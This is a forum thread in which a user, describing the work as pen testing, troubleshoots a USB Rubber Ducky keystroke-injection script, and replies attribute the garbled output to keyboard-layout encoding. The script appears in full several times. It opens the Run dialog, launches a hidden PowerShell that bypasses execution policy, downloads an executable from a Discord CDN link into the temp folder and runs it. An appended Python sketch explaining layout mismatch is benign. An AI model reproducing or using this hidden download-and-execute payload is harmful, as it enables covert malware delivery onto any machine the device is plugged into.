randomblueshark Posted January 9, 2021

Hello, I'm a newb to the USB Rubber Ducky. I received mine 4 days ago for pen testing, and I have a small problem with the STRING code. Here is the code I used:

DELAY 200
CONTROL ESCAPE
DELAY 300
STRING run
DELAY 100
ENTER
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/796873244677242910/calc.exe',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\""
ENTER

When executed in notepad.exe, I get this code with a lot of @ and #:

powershell -NoP -NonI -W Hidden -Exec Bypass @IEX (New-Object System.Net.WebClient).DownloadFile(<https:##cdn.discordapp.com#attachments#777729234181029919#796873244677242910#calc.exe<,@$env:tempbob.exe@); Start-Process @$env:tempbob.exe@@

What am I doing wrong? Can someone help?

chrizree Posted January 9, 2021

It seems as if you need to specify a keyboard language when creating the payload/inject.bin - is the "victim" anything else than US keyb layout?

chrizree Posted January 10, 2021

What method are you using to create the inject.bin file?

randomblueshark Posted January 10, 2021 (Author)

I own a Corsair K70 keyboard. Everything looks good using the ca-fr.json on https://shop.hak5.org/pages/ducky-encoder except one thing: the USB Rubber Ducky does not recognize this key ---> " and the Ducky replaces it with this key ---> \

powershell -NoP -NonI -W Hidden -Exec Bypass \IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\\$env:temp\12345.exe\\); Start-Process \\$env:temp\12345.exe\\\

After the execution, the code is missing a lot of ". The Ducky must click on Shift and the one surrounded in red, but it clicks on Shift + \, the left key beside the 1 key.

Original code:

STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\"$env:temp\12345.exe\"); Start-Process \"$env:temp\12345.exe\""

Edited January 10, 2021 by myapple851

chrizree Posted January 10, 2021

So, even if something is still not correct, something has changed between your first and last post; @ has become \, what did you change? Forward slashes / also seem to have been changed to now be correct (was previously the # char in the first post), also < seems to be correct as it's ' in the latest example of your output.

Also not sure what keyboard layout you have in the screenshot of your On-Screen Keyboard. I configured one of my Windows 10 boxes for Canadian French and Canadian-French (Legacy) and none of them showed the mapping you have captured in your screenshot. Your physical keyboard doesn't matter, btw.

I used the chars that give you problems with other keyboard layouts and I have no problems running my payloads that contain those chars. Perhaps the ca-fr.json language map file isn't all correct?

Edited January 10, 2021 by chrizree

randomblueshark Posted January 10, 2021 (Author)

OK, I figured out why it's doing that: my keyboard is US... now it's working, the code works on my main OS system. Thanks for the help anyway.

Edited January 11, 2021 by myapple851
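
The layout mismatch discussed in this thread, as an added example that is not part of the original posts: an encoder turns characters into key positions (HID usage IDs plus a modifier), and the host's configured layout turns those positions back into characters. The thread does not show the contents of ca-fr.json, so the sketch uses small constructed US and UK tables as an assumption; the function names and the sample line are also constructed.

```python
# Added example: HID reports carry key positions (usage IDs), not characters.
import string

SHIFT = 0x02  # left-shift bit in the HID modifier byte

def common_keys():
    """Keys that sit at the same position on the US and UK layouts."""
    keys = {" ": (0, 0x2C), "-": (0, 0x2D), ".": (0, 0x37), "/": (0, 0x38),
            "'": (0, 0x34), "$": (SHIFT, 0x21), "0": (0, 0x27)}
    for i, ch in enumerate(string.ascii_lowercase):
        keys[ch] = (0, 0x04 + i)
        keys[ch.upper()] = (SHIFT, 0x04 + i)
    for i, ch in enumerate("123456789"):
        keys[ch] = (0, 0x1E + i)
    return keys

# Partial, constructed tables: only the keys this demonstration needs.
US = {**common_keys(), '"': (SHIFT, 0x34), "@": (SHIFT, 0x1F), "#": (SHIFT, 0x20)}
UK = {**common_keys(), '"': (SHIFT, 0x1F), "@": (SHIFT, 0x34), "£": (SHIFT, 0x20)}

def encode(text, layout):
    """What an encoder does: turn characters into (modifier, usage) pairs."""
    return [layout[ch] for ch in text]

def decode(reports, layout):
    """What the host does: turn key positions back into characters."""
    reverse = {key: ch for ch, key in layout.items()}
    return "".join(reverse.get(r, "\ufffd") for r in reports)

def substitutions(text, encoder_layout, host_layout):
    """Characters that come out different when the two layouts disagree."""
    typed = decode(encode(text, encoder_layout), host_layout)
    return {a: b for a, b in zip(text, typed) if a != b}

if __name__ == "__main__":
    sample = 'Write-Output "a@b" #1'  # constructed sample line
    print(decode(encode(sample, US), UK))
    print(substitutions(sample, US, UK))
```

Letters and digits survive because both layouts put them on the same keys; only the punctuation that the two layouts place differently is swapped, which is why a mismatched payload looks mostly right with a few wrong symbols.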